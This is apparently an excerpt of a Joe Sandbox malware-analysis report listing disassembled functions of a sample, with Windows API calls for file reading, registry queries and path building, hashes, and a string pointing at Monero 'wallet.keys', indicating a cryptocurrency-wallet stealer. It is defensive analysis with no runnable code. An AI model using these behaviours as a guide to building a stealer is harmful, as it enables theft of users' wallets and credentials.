Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 2931873225-0
Opcode ID: b20eba3a73f77f7bff12d2f92c4531c3fdf9a76fab9cdb768da72ac69a77a7bf
Instruction ID: 5c634964045ff3733a115de38f21d9b92eeff5a52e8578650272e9abb87419f7
Opcode Fuzzy Hash: b20eba3a73f77f7bff12d2f92c4531c3fdf9a76fab9cdb768da72ac69a77a7bf
Instruction Fuzzy Hash: FB31FE7190010CABDB08FBA5DC56BFE77B8AF04340F1445A8F706B7191DFB05A09C6A6

Function 00BE99C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BE99EC
GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BE9A11
LocalAlloc.KERNEL32(00000040,?), ref: 00BE9A31
ReadFile.KERNEL32(000000FF,?,00000000,00BE148F,00000000), ref: 00BE9A5A
LocalFree.KERNEL32(00BE148F), ref: 00BE9A90
CloseHandle.KERNEL32(000000FF), ref: 00BE9A9A

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: a74f6ac488aa13bf0ad58e650c276f2cf6981d73a6035603d6f1a971ec7dd5a6
Instruction ID: 2a5ab0388dfd71f779a1c89df2af092bf8f8b4f655ad7efdc711948e2bee95b5
Opcode Fuzzy Hash: a74f6ac488aa13bf0ad58e650c276f2cf6981d73a6035603d6f1a971ec7dd5a6
Instruction Fuzzy Hash: B7312DB4A00209EFDB24CF96D985FAE77F5FF48340F1081A8E915A7290D774A949CFA1

Function 00BF4780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,0173E2B8), ref: 00BF47DB

Part of subcall function 00BF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00BF8E0B

lstrcat.KERNEL32(?,00000000), ref: 00BF4801
lstrcat.KERNEL32(?,?), ref: 00BF4820
lstrcat.KERNEL32(?,?), ref: 00BF4834
lstrcat.KERNEL32(?,0172B948), ref: 00BF4847
lstrcat.KERNEL32(?,?), ref: 00BF485B
lstrcat.KERNEL32(?,0173D690), ref: 00BF486F

Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788

Part of subcall function 00BF8D90: GetFileAttributesA.KERNEL32(00000000,?,00BE1B54,?,?,00C0564C,?,?,00C00E1F), ref: 00BF8D9F

Part of subcall function 00BF4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00BF4580
Part of subcall function 00BF4570: RtlAllocateHeap.NTDLL(00000000), ref: 00BF4587
Part of subcall function 00BF4570: wsprintfA.USER32 ref: 00BF45A6
Part of subcall function 00BF4570: FindFirstFileA.KERNEL32(?,?), ref: 00BF45BD

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID:
API String ID: 2540262943-0
Opcode ID: 3fdf05351b3cf652157c86ba058144ed3197bab22e01e92f528eb62c37131da7
Instruction ID: 5f31e5fe3ff319dcf29f43cc8fbde084999e2c1aec60d291021c90734125cd16
Opcode Fuzzy Hash: 3fdf05351b3cf652157c86ba058144ed3197bab22e01e92f528eb62c37131da7
Instruction Fuzzy Hash: 0B3155B690020C5BCB24F7A0DC86EFD73BCAB58700F4445D9B319A7091DEB4D68D8B95

Function 00BF40B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,0173D8D0,00000000,00020119,?), ref: 00BF40F4
RegQueryValueExA.ADVAPI32(?,0173E3C0,00000000,00000000,00000000,000000FF), ref: 00BF4118
RegCloseKey.ADVAPI32(?), ref: 00BF4122
lstrcat.KERNEL32(?,00000000), ref: 00BF4147
lstrcat.KERNEL32(?,0173E240), ref: 00BF415B

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValue
String ID:
API String ID: 690832082-0
Opcode ID: 45b1a642d27f1dc18b52238e6f7e78795714320d4ae4d6d8b87a9031b743d896
Instruction ID: 3baeafb753dd300c56ee80950d0d5902bebe677f0d875a0a32151dce1a650a66
Opcode Fuzzy Hash: 45b1a642d27f1dc18b52238e6f7e78795714320d4ae4d6d8b87a9031b743d896
Instruction Fuzzy Hash: 70419CB6D00108ABDB24FBA0DC46FFE73BDAB58700F044998B71557181EA755B8D8BE2

Function 00BF7E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BF7E37
RtlAllocateHeap.NTDLL(00000000), ref: 00BF7E3E
RegOpenKeyExA.KERNEL32(80000002,0172C2E0,00000000,00020119,?), ref: 00BF7E5E
RegQueryValueExA.KERNEL32(?,0173D8F0,00000000,00000000,000000FF,000000FF), ref: 00BF7E7F
RegCloseKey.ADVAPI32(?), ref: 00BF7E92

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: dee1dd683cdfcd90fa752526e008283d7f54f4f04dab3a77f599b1022374ef66
Instruction ID: 018c86fa5ad8a837702cfc05d066f08ee1f09f02e634e7a67546960098ad366c
Opcode Fuzzy Hash: dee1dd683cdfcd90fa752526e008283d7f54f4f04dab3a77f599b1022374ef66
Instruction Fuzzy Hash: 19116DB1A44209AFD714CB95DD49F7BBBBCEB04710F1041AAF705A7280DB7458098BA1

Function 00BE12A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BE12B4
RtlAllocateHeap.NTDLL(00000000), ref: 00BE12BB
RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00BE12D7
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00BE12F5
RegCloseKey.ADVAPI32(?), ref: 00BE12FF

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 46f898041863b77dc2c01dc03eb220280f5b0e4e011072ecf8440653801c220d
Instruction ID: 0303e8c5eeb90b57bfcd0e322174f28ef3b65760777813069e2fe090609c41f2
Opcode Fuzzy Hash: 46f898041863b77dc2c01dc03eb220280f5b0e4e011072ecf8440653801c220d
Instruction Fuzzy Hash: B50131B9A40208BFDB18DFE5DC49FAEB7B8FB48701F108169FB05A7280D6719A058F51

Function 00BEA0A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(01739290,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF), ref: 00BEA0BD
LoadLibraryA.KERNEL32(0173D910), ref: 00BEA146

Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788

Part of subcall function 00BFA820: lstrlen.KERNEL32(00BE4F05,?,?,00BE4F05,00C00DDE), ref: 00BFA82B
Part of subcall function 00BFA820: lstrcpy.KERNEL32(00C00DDE,00000000), ref: 00BFA885

Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,01739040,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12

Part of subcall function 00BFA920: lstrcpy.KERNEL32(00000000,?), ref: 00BFA972
Part of subcall function 00BFA920: lstrcat.KERNEL32(00000000), ref: 00BFA982

Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905

SetEnvironmentVariableA.KERNEL32(01739290,00000000,00000000,?,00C012D8,?,?,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00C00AFE), ref: 00BEA132

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 00BEA0B2, 00BEA0C6, 00BEA0DC

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 2929475105-3463377506
Opcode ID: e4df73ee1f8b73693f46224603bc416a977359a3ded26cb24db8dded51355a85
Instruction ID: 1e51fd1f757f23386b94e7eb00f6713f4764c0b8defbceb2da86df4eec51c7be
Opcode Fuzzy Hash: e4df73ee1f8b73693f46224603bc416a977359a3ded26cb24db8dded51355a85
Instruction Fuzzy Hash: CB4160B19011049FCB24EFA6EC55AAA73F9FB08301F1C4178E505B32A1DB75594ECB63

Function 00BEA260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788

Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,01739040,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12

Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905

Part of subcall function 00BF8B60: GetSystemTime.KERNEL32(00C00E1A,0173A670,00C005AE,?,?,00BE13F9,?,0000001A,00C00E1A,00000000,?,01739040,?,\Monero\wallet.keys,00C00E17), ref: 00BF8B86

